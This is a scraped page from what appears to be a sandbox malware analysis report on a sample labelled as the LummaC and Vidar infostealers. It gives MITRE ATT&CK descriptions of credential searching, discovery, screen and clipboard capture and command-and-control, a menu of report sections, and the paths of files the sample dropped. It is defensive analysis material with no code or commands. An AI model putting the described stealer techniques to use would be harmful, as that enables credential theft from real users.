Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\GCGHJEBGHJ.exe

C:\ProgramData\IJKFHDBKFCAA\AECAKE

C:\ProgramData\IJKFHDBKFCAA\CBFIJE

C:\ProgramData\IJKFHDBKFCAA\CGIDAA

C:\ProgramData\IJKFHDBKFCAA\GCBFBG

C:\ProgramData\IJKFHDBKFCAA\GHIJJE

C:\ProgramData\IJKFHDBKFCAA\GIJJKF

C:\ProgramData\IJKFHDBKFCAA\HIDGCF

C:\ProgramData\IJKFHDBKFCAA\KECBGC

C:\ProgramData\IJKFHDBKFCAA\KKFBAA

C:\ProgramData\IJKFHDBKFCAA\freebl3.dll

Windows Analysis Report
file.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre